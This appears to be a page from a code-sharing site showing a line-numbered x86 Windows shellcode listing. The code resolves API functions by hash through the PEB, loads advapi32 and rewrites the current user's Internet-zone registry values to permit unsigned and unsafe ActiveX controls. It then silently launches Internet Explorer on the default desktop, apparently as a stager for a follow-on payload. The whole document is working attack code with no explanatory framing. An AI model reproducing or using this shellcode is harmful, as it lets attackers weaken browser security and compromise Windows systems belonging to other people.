Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
BITS   32
2
GLOBAL _start
3

4
_start:
5
	cld
6
	call  get_find_function
7
strings:
8
	db    "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3", 0x0
9
reg_values:
10
	db    "1004120012011001"
11
url:
12
	db    "C:\progra~1\intern~1\iexplore -new", 0x0
13

14
get_find_function:
15
	call startup
16
find_function:
17
	pushad
18
	mov   ebp, [esp + 0x24]
19
	mov   eax, [ebp + 0x3c]
20
	mov   edi, [ebp + eax + 0x78]
21
	add   edi, ebp
22
	mov   ecx, [edi + 0x18]
23
	mov   ebx, [edi + 0x20]
24
	add   ebx, ebp
25
find_function_loop:
26
	jecxz find_function_finished
27
	dec   ecx
28
	mov   esi, [ebx + ecx * 4]
29
	add   esi, ebp
30
	compute_hash:
31
	xor   eax, eax
32
	cdq
33
compute_hash_again:
34
	lodsb
35
	test  al, al
36
	jz    compute_hash_finished
37
	ror   edx, 0xd
38
	add   edx, eax
39
	jmp   compute_hash_again
40
compute_hash_finished:         
41
find_function_compare:           
42
	cmp   edx, [esp + 0x28]
43
	jnz   find_function_loop
44
	mov   ebx, [edi + 0x24]
45
	add   ebx, ebp
46
	mov   cx, [ebx + 2 * ecx]
47
	mov   ebx, [edi + 0x1c]
48
	add   ebx, ebp
49
	mov   eax, [ebx + 4 * ecx]
50
	add   eax, ebp
51
	mov   [esp + 0x1c], eax
52
find_function_finished:
53
	popad
54
	retn 8
55

56
startup:
57
	pop   edi
58
	pop   ebx
59
find_kernel32:
60
	xor   edx, edx
61
	mov   eax, [fs:edx+0x30]
62
	test  eax, eax
63
	js    find_kernel32_9x
64
find_kernel32_nt:
65
	mov   eax, [eax + 0x0c]
66
	mov   esi, [eax + 0x1c]
67
	lodsd
68
	mov   eax, [eax + 0x8]
69
	jmp   short find_kernel32_finished
70
find_kernel32_9x:
71
	mov   eax, [eax + 0x34]
72
	add   eax, byte 0x7c
73
	mov   eax, [eax + 0x3c]
74
find_kernel32_finished:
75

76
	mov   ebp, esp
77
find_kernel32_symbols:
78
	push  0x73e2d87e ; ExitProcess
79
	push  eax
80
	push  0x16b3fe72 ; CreateProcessA
81
	push  eax
82
	push  0xec0e4e8e ; LoadLibraryA
83
	push  eax
84
	call  edi
85
	xchg  eax, esi
86
	call  edi
87
	mov   [ebp], eax
88
	call  edi
89
	mov   [ebp + 0x4], eax
90

91
load_advapi32:
92
	push  edx
93
	push  0x32336970
94
	push  0x61766461
95
	push  esp
96
	call  esi
97

98
resolve_advapi32_symbols:
99
	push  0x02922ba9
100
	push  eax
101
	push  0x2d1c9add
102
	push  eax
103
	call  edi
104
	mov   [ebp + 0x8], eax
105
	call  edi
106
	xchg  eax, edi
107
 
108
	xchg  esi, ebx
109
open_key:
110
	push  esp
111
	push  esi
112
	push  0x80000001
113
	call  edi
114
	pop   ebx
115
	add   esi, byte (reg_values - strings)
116

117
	push  eax
118
	mov   edi, esp
119
set_values:
120
	cmp   byte [esi], 'C'
121
	jz    initialize_structs
122
	push  eax
123
	lodsd
124
	push  eax
125
	mov   eax, esp
126
	push  byte 0x4
127
	push  edi
128
	push  byte 0x4
129
	push  byte 0x0
130
	push  eax
131
	push  ebx
132
	call  [ebp + 0x8]
133
	jmp   set_values
134

135
; This is NT specific, but it lets us execute iexplore regardless
136
; of what drive it's installed on so long as it's on the same drive
137
; as the WINDOWS directory, which it should always be.
138
fixup_drive_letter:
139
	mov   cl, byte [0x7ffe0030]
140
	mov   byte [esi], cl
141

142
initialize_structs:
143
	push  byte 0x54
144
	pop   ecx
145
	sub   esp, ecx
146
	mov   edi, esp
147
	push  edi
148
	rep   stosb
149
	pop   edi
150
	mov   byte [edi], 0x44
151
	inc   byte [edi + 0x2c]
152
	inc   byte [edi + 0x2d]
153

154
; set lpDesktop to WinSta0\Default so that this works with non-interactive services
155
	push  0x00746c75
156
   push  0x61666544
157
   push  0x5c306174
158
	push  0x536e6957
159
	mov   [edi + 8], esp
160

161
execute_process:
162
	lea   ebx, [edi + 0x44]
163
	push  ebx
164
	push  edi
165
	push  eax
166
	push  eax
167
	push  byte 0x10
168
	push  eax
169
	push  eax
170
	push  eax
171
	push  esi
172
	push  eax
173
	call  [ebp]
174

175
exit_process:
176
	call  [ebp + 0x4]	
177

178